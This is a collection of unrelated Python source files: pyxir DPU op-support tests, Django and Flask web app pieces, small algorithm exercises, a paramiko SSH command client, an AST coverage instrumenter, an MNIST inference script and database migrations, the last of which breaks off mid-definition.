assert not conv2d_op_support(X, [], [])
def test_conv2d_transpose_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import conv2d_transpose_op_support
X = XLayer(
type=["Conv2DTranspose"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
"channels": [4, 2],
"groups": 1,
},
)
assert conv2d_transpose_op_support(X, [], [])
X = XLayer(
type=["Conv2DTranspose"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
"channels": [2570, 2],
"groups": 1,
},
)
assert not conv2d_transpose_op_support(X, [], [])
def test_dpuv2_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import dpu_op_support
X = XLayer(
type=["DPU"],
name="layer1",
shapes=[[-1, 2, 4, 4], [-1, 1, 4, 4]],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={},
)
assert dpu_op_support(X, [], [])
def test_eltwise_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import eltwise_op_support
X = XLayer(
type=["Eltwise"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={},
)
assert eltwise_op_support(X, [], [])
def test_pad_pooling_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import pad_op_support
X = XLayer(
type=["Pad"],
name="pad1",
shapes=[-1, 2, 6, 6],
sizes=[72],
bottoms=[],
tops=["layer1"],
targets=[],
attrs={"padding": [[0, 0], [0, 0], [2, 2], [2, 2]]},
)
tX = XLayer(
type=["Pooling"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=["pad1"],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [3, 3],
"padding": [[0, 0], [0, 0], [0, 0], [0, 0]],
},
)
assert pad_op_support(X, [], [tX])
X = XLayer(
type=["Pad"],
name="pad1",
shapes=[-1, 2, 6, 6],
sizes=[72],
bottoms=[],
tops=["layer1"],
targets=[],
attrs={"padding": [[0, 0], [0, 0], [5, 2], [5, 2]]},
)
tX = XLayer(
type=["Pooling"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=["pad1"],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [3, 3],
"padding": [[0, 0], [0, 0], [0, 0], [0, 0]],
},
)
assert not pad_op_support(X, [], [tX])
def test_pad_convolution_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import pad_op_support
X = XLayer(
type=["Pad"],
name="pad1",
shapes=[-1, 2, 6, 6],
sizes=[72],
bottoms=[],
tops=["layer1"],
targets=[],
attrs={"padding": [[0, 0], [0, 0], [1, 1], [1, 1]]},
)
tX = XLayer(
type=["Convolution"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=["pad1"],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [0, 0], [0, 0]],
"channels": [4, 2],
"groups": 1,
},
)
assert pad_op_support(X, [], [tX])
X = XLayer(
type=["Pad"],
name="pad1",
shapes=[-1, 2, 6, 6],
sizes=[72],
bottoms=[],
tops=["layer1"],
targets=[],
attrs={"padding": [[0, 0], [0, 0], [2, 2], [2, 2]]},
)
tX = XLayer(
type=["Convolution"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=["pad1"],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [0, 0], [0, 0]],
"channels": [4, 2],
"groups": 1,
},
)
assert not pad_op_support(X, [], [tX])
def test_pooling_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import pooling_op_support
X = XLayer(
type=["Pooling"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [3, 3],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
},
)
assert pooling_op_support(X, [], [])
X = XLayer(
type=["Pooling"],
name="layer1",
shapes=[-1, 2570, 4, 4],
sizes=[2570 * 16],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
},
)
assert not pooling_op_support(X, [], [])
def test_mean_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import mean_op_support
X = XLayer(
type=["Mean"],
name="layer1",
shapes=[-1, 2, 1, 1],
sizes=[2],
bottoms=[],
tops=[],
targets=[],
attrs={"axes": [2, 3], "keepdims": True, "exclude": False},
)
assert mean_op_support(X, [], [])
X = XLayer(
type=["Mean"],
name="layer1",
shapes=[-1, 1, 4, 4],
sizes=[16],
bottoms=[],
tops=[],
targets=[],
attrs={"axes": [1], "keepdims": True, "exclude": False},
)
assert not mean_op_support(X, [], [])
def test_relu_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import relu_op_support
X = XLayer(
type=["ReLU"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={},
)
assert relu_op_support(X, [], [])
def test_relu6_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import relu6_op_support
X = XLayer(
type=["ReLU6"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={},
)
assert relu6_op_support(X, [], [])
def test_scale_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import scale_op_support
X = XLayer(
type=["Scale"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert scale_op_support(X, [], [])
X = XLayer(
type=["Scale"],
name="layer1",
shapes=[-1, 2570, 4, 4],
sizes=[2570 * 16],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert not scale_op_support(X, [], [])
|
from django.conf.urls import url
from .views import checkout, checkout_buy_app, thank_you
# URL routes for the checkout app.
urlpatterns = [
    url(r'^$', checkout, name='checkout'),
    url(r'^buy-app$', checkout_buy_app, name='checkout-app'),
    url(r'^thank-you$', thank_you, name='thank-you'),
]
|
'''Auto-creates the database'''
from cfg import CONNECTION_STRING
from db import setup_db, populate
# Create the database schema, then seed it with initial data.
setup_db(CONNECTION_STRING)
populate(CONNECTION_STRING)
|
def bin_search(arr, target, kind="<="):
    """Binary search over a sorted sequence.

    kind "<=": return the largest element of `arr` that is <= target.
    kind ">=": return the smallest element of `arr` that is >= target.

    Assumes arr is sorted and arr[0] <= target <= arr[-1]; callers pad the
    array with -inf/+inf sentinels to guarantee this.
    """
    assert kind in ["<=", ">="]
    if kind == "<=":
        comp = lambda a, b: a <= b
    else:
        comp = lambda a, b: a < b
    l = 0
    r = len(arr) - 1
    # Invariant: comp(arr[l], target) holds, comp(arr[r], target) does not.
    while l < r - 1:
        m = (l + r) // 2
        # BUG FIX: the original indexed a module-level global `a` instead of
        # the `arr` parameter, so the function only worked by accident when a
        # global named `a` happened to hold the same data.
        if comp(arr[m], target):
            l = m
        else:
            r = m
    if kind == "<=":
        return arr[l]
    else:
        return arr[r]
def nearest(arr, target):
    """Return the array value closest to target, preferring the lower on ties."""
    below = bin_search(arr, target, "<=")
    above = bin_search(arr, target, ">=")
    dist_above = above - target
    dist_below = target - below
    return above if dist_above < dist_below else below
# First input line is the element count — unused, the list is read whole.
_ = input()
a = [int(x) for x in input().split()]
# Sentinels guarantee bin_search always finds a neighbour on both sides.
a = [float("-Infinity")] + a + [float("+Infinity")]
for target in map(int, input().split()):
    print(nearest(a, target))
|
import os
def check_dependencies():
    """Placeholder: dependency checking is not implemented yet."""
    pass
def make_directories():
    """Create the 'output' and 'temp' working directories.

    Prints a notice instead of raising when a directory cannot be created
    (most commonly because it already exists).
    """
    # BUG FIX: the bare `except:` clauses swallowed every exception,
    # including KeyboardInterrupt/SystemExit; only OS-level failures
    # (FileExistsError, permissions, ...) should be reported and skipped.
    try:
        os.mkdir("output")
    except OSError:
        print ("Unable to make directory 'output', it may already exist.")
    try:
        os.mkdir("temp")
    except OSError:
        print ("Unable to make directory 'temp', it may already exist.")
|
#!/usr/bin/python3
# Minimal interactive SSH "shell": connects with password auth, then runs
# each line read from stdin on the remote host and prints stdout/stderr.
import sys
import paramiko
import time
#print(sys.argv)
if len(sys.argv) != 4:
    print("sudo apt install python3-pip")
    print("pip3 install paramiko")
    print("Usage: %s host port user" %sys.argv[0])
    print("       %s 1.1.1.1 22 admin" %sys.argv[0])
    exit()
host = sys.argv[1]
port = sys.argv[2]
user = sys.argv[3]
passwd = input("password: ")
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
    ssh.connect(host, port, user, passwd, timeout=10)
    print("%s@%s>" %(user, host), end=' ')
    sys.stdout.flush()
except paramiko.AuthenticationException:
    print("[!] Authentication failed")
    sys.exit(1)
# BUG FIX: this clause was listed after `except Exception` and therefore
# unreachable, and it referenced an undefined name `sshException`.
except paramiko.SSHException as e:
    print("[!] Unable to establish SSH connection: %s"%(e))
    sys.exit(1)
except Exception:
    print("[!] Connection Failed")
    # BUG FIX: the script previously fell through into the command loop
    # with no live connection; exit instead.
    sys.exit(1)
while True:
    input_cmd = sys.stdin.readline()
    if not input_cmd:
        # BUG FIX: stop on stdin EOF; previously the loop spun forever and
        # ssh.close() below was unreachable.
        break
    stdin, stdout, stderr = ssh.exec_command(input_cmd)
    channel = stdout.channel
    ret = channel.recv_exit_status()
    if ret == 0:
        print(stdout.read().decode())
    else:
        print(stderr.read().decode())
    print("%s@%s>" %(user, host), end=' ')
    sys.stdout.flush()
ssh.close()
|
def binary_search(array, infi, supr, x):
    """Recursively search sorted `array[infi:supr + 1]` for `x`.

    Returns the index of `x`, or None when `x` is not present.
    """
    if supr < infi:
        # BUG FIX (explicitness): the original fell off the end of the
        # function and returned None implicitly when the window emptied;
        # make the not-found result an explicit, documented guard clause.
        return None
    middle = (supr + infi) // 2
    if array[middle] == x:
        return middle
    if array[middle] > x:
        return binary_search(array, infi, middle - 1, x)
    return binary_search(array, middle + 1, supr, x)
# Demo: sort a small list and locate one element in it.
arr = sorted([6, 54, 34, 78, 1, 4, 80])
search = 78
result = binary_search(arr, 0, len(arr) - 1, search)
print('The index of element is', result)
from typing import List
from BaseClasses.Proposition import Proposition
from PredicateLogic.Existent import Existent
from PredicateLogic.Quantifier import Quantifier
class PredicatedProposition(Proposition):
    """A proposition extended with quantified existents (predicate logic).

    NOTE(review): `existents = List[Existent]` assigns the typing construct
    itself (not a list instance) to the class attribute, and `quant` is a
    bare annotation — presumably instances are expected to overwrite both.
    Verify against callers before relying on these defaults.
    """
    # Wrapped proposition; None until assigned.
    subProposition = None
    existents = List[Existent]
    quant : Quantifier
|
# -*- coding: utf-8 -*-
# django imports
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
# rewriters imports
from registration.backends.simple import SimpleBackend
from registration import signals
from registration.forms import RegistrationFormUniqueEmail
from registration.forms import attrs_dict
class InactiveSimpleBackend(SimpleBackend):
    """
    Registration backend that creates users in an inactive state.
    """
    def register(self, request, **kwargs):
        """Create an inactive user and emit the user_registered signal."""
        new_user = User.objects.create_user(
            kwargs['username'], kwargs['email'], kwargs['password1'])
        new_user.is_active = False
        new_user.save()
        signals.user_registered.send(
            sender=self.__class__, user=new_user, request=request)
        return new_user
class InactiveProfileRegisterBackend(SimpleBackend):
    """
    Registration backend creating an inactive user with extra profile data.
    """
    def register(self, request, **kwargs):
        """Create an inactive user, fill name and phone, emit user_registered."""
        new_user = User.objects.create_user(
            kwargs['username'], kwargs['email'], kwargs['password1'])
        new_user.is_active = False
        new_user.first_name = kwargs['first_name']
        new_user.last_name = kwargs['last_name']
        new_user.save()
        # The phone number lives on the related profile, not the user row.
        profile = new_user.profile
        profile.phone = kwargs['phone']
        profile.save()
        signals.user_registered.send(
            sender=self.__class__, user=new_user, request=request)
        return new_user
class RegistrationFormExtraInfo(RegistrationFormUniqueEmail):
    """ Form to make users fill more information during registration.

    Adds first name, last name and phone on top of the unique-email
    registration form.
    """
    # NOTE(review): labels are user-facing Russian strings and must stay as-is.
    first_name = forms.CharField(
        max_length=30,
        widget=forms.TextInput(attrs=attrs_dict),
        label="Имя",
    )
    last_name = forms.CharField(
        max_length=30,
        widget=forms.TextInput(attrs=attrs_dict),
        label="Фамилия",
    )
    phone = forms.CharField(
        max_length=20,
        widget=forms.TextInput(attrs=attrs_dict),
        label="Телефон",
    )
from .type import POSSIBLE_TYPES
import itertools
import ast
import astor
class Profiler(ast.NodeTransformer):
    """AST transformer that instruments branch predicates for coverage.

    Every `if`/`while` test and `for` iterable is wrapped in a call to a
    `covw` (covgen.wrapper) tracing helper carrying a unique branch id.
    Also collects per-line variable names and literal constants to seed
    test generation.
    """
    def __init__(self):
        # BUG FIX: the original called bare `super()`, which only builds the
        # proxy object and never invokes the parent initialiser; call it.
        super().__init__()
        self.branches = dict()        # instrumented AST node -> branch id
        self.branch_id = 1            # next branch id to assign
        self.current_lineno = None    # line being scanned in collect_var_names
        self.line_and_vars = dict()   # lineno -> set of variable names used
    def visit_predicate(self, expr_node, depth=0):
        """Wrap a predicate expression in the matching covw.* tracing call.

        Nested sub-predicates (depth > 0) carry a negated branch id so the
        wrapper can distinguish them from the top-level predicate.
        Raises for expression kinds that cannot be instrumented.
        """
        bid_multiplier = -1 if depth > 0 else 1
        if isinstance(expr_node, ast.Compare):
            # For a chained comparison (a < b < c) only the last comparison
            # is wrapped; everything before it becomes the left operand.
            if len(expr_node.ops) > 1:
                left_node = ast.Compare(
                    left=expr_node.left,
                    ops=expr_node.ops[:-1],
                    comparators=expr_node.comparators[:-1])
            else:
                left_node = expr_node.left
            expr_node = ast.Call(
                func=ast.Attribute(
                    value=ast.Name(id='covw', ctx=ast.Load()),
                    attr='comparison',
                    ctx=ast.Load()),
                args=[
                    ast.Num(n=bid_multiplier * self.branch_id),
                    ast.Num(n=depth),
                    ast.Str(s=expr_node.ops[-1].__class__.__name__), left_node,
                    expr_node.comparators[-1]
                ],
                keywords=[])
        elif isinstance(expr_node, ast.BoolOp):
            # Instrument each operand first, then wrap the whole and/or.
            for i, value in enumerate(expr_node.values):
                expr_node.values[i] = self.visit_predicate(value, depth + 1)
            expr_node = ast.Call(
                func=ast.Attribute(
                    value=ast.Name(id='covw', ctx=ast.Load()),
                    attr='boolop',
                    ctx=ast.Load()),
                args=[
                    ast.Num(n=bid_multiplier * self.branch_id),
                    ast.Num(n=depth),
                    ast.Str(s=expr_node.op.__class__.__name__),
                    ast.List(elts=expr_node.values, ctx=ast.Load())
                ],
                keywords=[])
        elif isinstance(expr_node, ast.UnaryOp) and isinstance(
                expr_node.op, ast.Not):
            expr_node = ast.Call(
                func=ast.Attribute(
                    value=ast.Name(id='covw', ctx=ast.Load()),
                    attr='unaryop',
                    ctx=ast.Load()),
                args=[
                    ast.Num(n=bid_multiplier * self.branch_id),
                    ast.Num(n=depth),
                    ast.Str(s=expr_node.op.__class__.__name__),
                    self.visit_predicate(expr_node.operand, depth + 1)
                ],
                keywords=[])
        elif isinstance(expr_node, ast.Name) or isinstance(
                expr_node, ast.Call):
            # A bare name or call used as a truth value.
            expr_node = ast.Call(
                func=ast.Attribute(
                    value=ast.Name(id='covw', ctx=ast.Load()),
                    attr='value',
                    ctx=ast.Load()),
                args=[
                    ast.Num(n=bid_multiplier * self.branch_id),
                    ast.Num(n=depth), expr_node
                ],
                keywords=[])
        else:
            raise Exception("Unsupported Branch Predicate")
        return expr_node
    def visit_branch_node(self, node):
        """Instrument the test of an if/while node and record its branch id."""
        expr_node = node.test
        expr_node = self.visit_predicate(expr_node, depth=0)
        self.branches[node] = self.branch_id
        self.branch_id += 1
        node.test = expr_node
        self.generic_visit(node)
        return ast.fix_missing_locations(node)
    def visit_If(self, node):
        return self.visit_branch_node(node)
    def visit_While(self, node):
        return self.visit_branch_node(node)
    def visit_For(self, node):
        """Wrap a for-loop's iterable in covw.iter and record its branch id."""
        iter_node = ast.Call(
            func=ast.Attribute(
                value=ast.Name(id='covw', ctx=ast.Load()),
                attr='iter',
                ctx=ast.Load()),
            args=[ast.Num(n=self.branch_id), ast.Num(n=0), node.iter],
            keywords=[])
        self.branches[node] = self.branch_id
        self.branch_id += 1
        node.iter = iter_node
        self.generic_visit(node)
        return ast.fix_missing_locations(node)
    def collect_var_names(self, node):
        """Map each line number to the set of variable names it references."""
        var_names = set()
        def visit_all_attr(node):
            # Track the most recent line number seen while descending.
            if hasattr(node, 'lineno'):
                self.current_lineno = node.lineno
            if not hasattr(node, '__dict__'):
                return
            if isinstance(node, ast.Name):
                self.line_and_vars[
                    self.current_lineno] = self.line_and_vars.get(
                        self.current_lineno, set())
                self.line_and_vars[self.current_lineno].add(node.id)
                return
            node_vars = vars(node)
            for k in node_vars:
                if isinstance(node_vars[k], list):
                    for stmt in node_vars[k]:
                        visit_all_attr(stmt)
                else:
                    visit_all_attr(node_vars[k])
        visit_all_attr(node)
        return self.line_and_vars
    def collect_constants(self, node):
        """Collect literal constants under `node`, grouped by Python type."""
        def add_constant(t, value):
            assert t in self.constants
            if not value in self.constants[t]:
                self.constants[t].append(value)
            return
        self.constants = dict()
        for t in POSSIBLE_TYPES:
            self.constants[t] = list()
        def visit_all_attr(node):
            if not hasattr(node, '__dict__'):
                return
            if isinstance(node, ast.Num):
                if isinstance(node.n, int):
                    # Integer literals also seed the float pool.
                    add_constant(int, node.n)
                    add_constant(float, node.n)
                elif isinstance(node.n, float):
                    add_constant(float, node.n)
                return
            elif isinstance(node, ast.Str):
                add_constant(str, node.s)
                return
            elif isinstance(node, ast.List):
                # Evaluate the literal to get a concrete value.
                add_constant(list, eval(compile(ast.Expression(body=node), '', mode='eval')))
                return
            elif isinstance(node, ast.Tuple):
                add_constant(tuple, eval(compile(ast.Expression(body=node), '', mode='eval')))
                return
            node_vars = vars(node)
            for k in node_vars:
                if isinstance(node_vars[k], list):
                    for stmt in node_vars[k]:
                        visit_all_attr(stmt)
                else:
                    visit_all_attr(node_vars[k])
        visit_all_attr(node)
        return self.constants
    def instrument(self, sourcefile, inst_sourcefile, function):
        """Instrument `function` in sourcefile, writing to inst_sourcefile.

        Returns (function_node, total_branches) where total_branches maps
        every (branch_id, outcome) pair to None (not yet covered).
        """
        def get_source(path):
            with open(path) as source_file:
                return source_file.read()
        source = get_source(sourcefile)
        root = ast.parse(source)
        # Insert 'import covgen.wrapper as covw' in front of the file
        import_node = ast.Import(
            names=[ast.alias(name='covgen.wrapper', asname='covw')])
        root.body.insert(0, import_node)
        ast.fix_missing_locations(root)
        function_node = None
        for stmt in root.body:
            if isinstance(stmt, ast.FunctionDef) and stmt.name == function:
                function_node = stmt
                break
        assert function_node
        self.collect_constants(function_node)
        self.visit(function_node)
        total_branches = {
            k: None
            for k in list(
                itertools.product(range(1, self.branch_id), [True, False]))
        }
        with open(inst_sourcefile, 'w') as instrumented:
            instrumented.write(astor.to_source(root))
        # Re-parse the instrumented output so variable names carry the
        # line numbers of the rewritten source.
        inst_source = get_source(inst_sourcefile)
        root = ast.parse(inst_source)
        inst_function_node = None
        for stmt in root.body:
            if isinstance(stmt, ast.FunctionDef) and stmt.name == function:
                inst_function_node = stmt
                break
        assert inst_function_node
        self.collect_var_names(inst_function_node)
        return function_node, total_branches
|
from flask import Flask, render_template, redirect, request, session
app = Flask(__name__)
# NOTE(review): hard-coded secret key — fine for a demo, not for production.
app.secret_key = "Keep it secret, keep it safe"
@app.route("/")
def index():
    """Render the survey form page."""
    return render_template("index.html")
@app.route("/process_survey", methods=['POST'])
def process():
    """Store the submitted survey fields in the session, then show results."""
    for field in ('first_name', 'dojo_location', 'fav_language', 'comment'):
        session[field] = request.form[field]
    return redirect("/result")
@app.route("/result")
def display():
    """Render the survey answers previously stored in the session."""
    answers = {
        key: session[key]
        for key in ('first_name', 'dojo_location', 'fav_language', 'comment')
    }
    return render_template("display.html", **answers)
if __name__=="__main__":
    # Development server only; debug=True must not be used in production.
    app.run(debug=True)
from django.shortcuts import render, redirect
from .models import Task
from .forms import TaskForm
def index(request):
    """Render the site home page with the total number of tasks."""
    context = {'title': 'Главная страница сайта', 'count': Task.objects.count()}
    return render(request, "main/index.html", context)
def task(request):
    """Render the task list page, newest tasks first."""
    newest_first = Task.objects.order_by('-id')
    return render(request, "main/task.html",
                  {'title': 'Список заданий', 'tasks': newest_first})
def create(request):
    """Handle the task-creation form: GET shows it, POST validates and saves."""
    error = ''
    if request.method == 'POST':
        form = TaskForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('task')
        # BUG FIX: keep the bound (invalid) form so the user's input and the
        # field validation errors survive re-rendering; previously an empty
        # form unconditionally replaced it below.
        error = 'Форма была неверной'
    else:
        form = TaskForm()
    context = {
        'form': form,
        'error': error
    }
    return render(request, "main/create.html", context)
#!/bin/env python
# Cap.6, p.144
alien_0 = {'x_position': 0, 'y_position': 25, 'speed': 'medium'}
# Move the alien according to its speed: any speed other than
# slow/medium gets the fast increment of 3.
speed_to_increment = {'slow': 1, 'medium': 2}
x_increment = speed_to_increment.get(alien_0['speed'], 3)
# The new position is the old position plus the increment.
alien_0['x_position'] += x_increment
print('Nova posiçao: ' + str(alien_0['x_position']))
|
# Generated by Django 3.0.8 on 2020-10-12 08:22
from django.db import migrations, models
def apply_migration(apps, schema_editor):
    """Create the default auth groups used by the application."""
    # Use the historical model via apps.get_model, never a direct import.
    Group = apps.get_model('auth', 'Group')
    Group.objects.bulk_create([
        Group(name='general_user'),
        Group(name='admin'),
    ])
def revert_migration(apps, schema_editor):
    """Delete the groups created by apply_migration (reverse operation)."""
    Group = apps.get_model('auth', 'Group')
    Group.objects.filter(
        name__in=[
            'general_user',
            'admin',
        ]
    ).delete()
class Migration(migrations.Migration):
    """Data migration: seed the 'general_user' and 'admin' auth groups."""
    dependencies = [
        ('users', '0001_initial'),
    ]
    operations = [
        migrations.RunPython(apply_migration, revert_migration)
    ]
|
import os
os.environ['KMP_DUPLICATE_LIB_OK']='True'
import torch
import torch.nn as nn
from mnist import *
import glob
import cv2
import torch.nn.functional as F
from torch.autograd import Variable
from torchvision import datasets, transforms
import numpy as np
import torchvision
from skimage import io,transform
class ConvNet(nn.Module):
    """Small CNN classifying 28x28 single-channel MNIST digits into 10 classes."""
    def __init__(self):
        super().__init__()
        # Input is batch*1*28*28 (batch samples, 1 channel for grayscale, 28x28 pixels).
        # Conv2d arguments: in_channels, out_channels, kernel_size.
        self.conv1 = nn.Conv2d(1, 10, 5) # 1 -> 10 channels, 5x5 kernel
        self.conv2 = nn.Conv2d(10, 20, 3) # 10 -> 20 channels, 3x3 kernel
        # Linear arguments: in_features, out_features.
        self.fc1 = nn.Linear(20*10*10, 500) # 2000 -> 500
        self.fc2 = nn.Linear(500, 10) # 500 -> 10 (one score per digit class)
    def forward(self,x):
        """Forward pass; returns per-class log-probabilities (log-softmax)."""
        in_size = x.size(0) # batch size; x is batch*1*28*28
        out = self.conv1(x) # batch*1*28*28 -> batch*10*24*24 (5x5 conv)
        out = F.relu(out) # ReLU keeps the shape
        out = F.max_pool2d(out, 2, 2)  # -> batch*10*12*12 (2x2 pooling halves H and W)
        out = self.conv2(out) # -> batch*20*10*10 (3x3 conv)
        out = F.relu(out) # batch*20*10*10
        out = out.view(in_size, -1) # flatten -> batch*2000 (-1 infers 20*10*10)
        out = self.fc1(out) # batch*2000 -> batch*500
        out = F.relu(out) # batch*500
        out = self.fc2(out) # batch*500 -> batch*10
        out = F.log_softmax(out, dim=1) # compute log(softmax(x)) over the classes
        return out
if __name__ =='__main__':
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    model = torch.load('./MNIST.pth') # load the trained model
    model = model.to(device)
    model.eval() # switch the model to inference mode
    img = cv2.imread('./handwriteeight.png', 0) # read the image to predict as grayscale
    img = cv2.resize(img, (28, 28))
    height,width=img.shape
    # Invert the image (255 - pixel): MNIST digits are white on black,
    # while a typical handwriting photo is black on white.
    dst=np.zeros((height,width),np.uint8)
    for i in range(height):
        for j in range(width):
            dst[i,j]=255-img[i,j]
    img = dst
    img=np.array(img).astype(np.float32)
    img=np.expand_dims(img,0)
    img=np.expand_dims(img,0) # after expanding: shape [1, 1, 28, 28]
    img=torch.from_numpy(img)
    img = img.to(device)
    output=model(Variable(img))
    prob = F.softmax(output, dim=1)
    prob = Variable(prob)
    # Parameters of a GPU-trained model live on the GPU; move to CPU before numpy.
    prob = prob.cpu().numpy()
    print(prob) # prob holds the probabilities of the 10 classes
    pred = np.argmax(prob) # pick the class with the highest probability
    print(pred.item())
|
import json
import io
def util_load_json(path):
    """Load and deserialize a UTF-8 encoded JSON file."""
    with io.open(path, mode="r", encoding="utf-8") as json_file:
        return json.load(json_file)
def util_load_raw(path):
    """Return the full text content of a UTF-8 encoded file."""
    with io.open(path, mode="r", encoding="utf-8") as raw_file:
        return raw_file.read()
def test_parse_links():
    """parse_links output must match the recorded markdown fixture."""
    from ZTAPParseLinks import parse_links
    input_events = util_load_json("test_data/events.json")
    expected_markdown = util_load_raw("test_data/output.md")
    assert parse_links(input_events) == expected_markdown
|
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
from typing import List
from shop_randomiser import generate_spoiler_log, load_rom_data, write_spoiler_log
import os
# Raw ROM bytes, populated by main(); module-global so helpers can share it.
ff5_bytes: List[int] = []
def parse_arguments() -> str:
    """Parse the CLI arguments and return the absolute path to the input ROM.

    Exits the process when the given file does not exist.
    """
    parser: ArgumentParser = ArgumentParser()
    parser.add_argument("-i", "--input_rom", type=str, metavar="input_rom", required=True)
    args: Namespace = parser.parse_args()
    input_rom: str = args.input_rom
    # Resolve relative paths against the current working directory.
    if not os.path.isabs(input_rom):
        input_rom = os.path.join(os.getcwd(), input_rom)
    if not os.path.exists(input_rom):
        print("{} does not seem to exist. Aborting.".format(input_rom))
        # BUG FIX: `exit` is an interactive helper injected by the `site`
        # module and may be absent (e.g. under `python -S` or frozen apps);
        # raise SystemExit (identical effect) instead.
        raise SystemExit(-1)
    return input_rom
def main():
    """Load the ROM named on the command line and write its spoiler log."""
    rom_path: str = parse_arguments()
    global ff5_bytes
    ff5_bytes = load_rom_data(rom_path=rom_path)
    log_lines: List[str] = generate_spoiler_log(ff5_bytes_ro=ff5_bytes)
    write_spoiler_log(spoiler_log=log_lines,
                      output_file_path="{}.spoiler_log.txt".format(rom_path))
def load_rom_data(rom_path: str) -> List[int]:
    """Read the ROM file and return its content as a list of byte values."""
    assert os.path.isfile(rom_path)
    with open(rom_path, "rb") as rom_file:
        return list(rom_file.read())
# Script entry point.
if __name__ == "__main__":
    main()
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration creating the Owner, Project and Technology
    tables plus the Technology<->Project M2M join table.

    NOTE(review): largely South-generated boilerplate; edit with care.
    """
    def forwards(self, orm):
        """Create all tables for the 'projects' app."""
        # Adding model 'Owner'
        db.create_table(u'projects_owner', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('first', self.gf('django.db.models.fields.TextField')()),
            ('last', self.gf('django.db.models.fields.TextField')()),
            ('details', self.gf('django.db.models.fields.TextField')()),
            ('public_source_repository', self.gf('django.db.models.fields.URLField')(max_length=200)),
        ))
        db.send_create_signal(u'projects', ['Owner'])
        # Adding model 'Project'
        db.create_table(u'projects_project', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.TextField')()),
            ('icon_path', self.gf('django.db.models.fields.TextField')()),
            ('description', self.gf('django.db.models.fields.TextField')()),
            ('ranking', self.gf('django.db.models.fields.IntegerField')()),
        ))
        db.send_create_signal(u'projects', ['Project'])
        # Adding model 'Technology'
        db.create_table(u'projects_technology', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('framework', self.gf('django.db.models.fields.TextField')()),
            ('language', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal(u'projects', ['Technology'])
        # Adding M2M table for field project on 'Technology'
        m2m_table_name = db.shorten_name(u'projects_technology_project')
        db.create_table(m2m_table_name, (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('technology', models.ForeignKey(orm[u'projects.technology'], null=False)),
            ('project', models.ForeignKey(orm[u'projects.project'], null=False))
        ))
        db.create_unique(m2m_table_name, ['technology_id', 'project_id'])
    def backwards(self, orm):
        """Drop all tables created by forwards()."""
        # Deleting model 'Owner'
        db.delete_table(u'projects_owner')
        # Deleting model 'Project'
        db.delete_table(u'projects_project')
        # Deleting model 'Technology'
        db.delete_table(u'projects_technology')
        # Removing M2M table for field project on 'Technology'
        db.delete_table(db.shorten_name(u'projects_technology_project'))
    # Frozen ORM description used by South to reconstruct historical models.
    models = {
        u'projects.owner': {
            'Meta': {'object_name': 'Owner'},
            'details': ('django.db.models.fields.TextField', [], {}),
            'first': ('django.db.models.fields.TextField', [], {}),
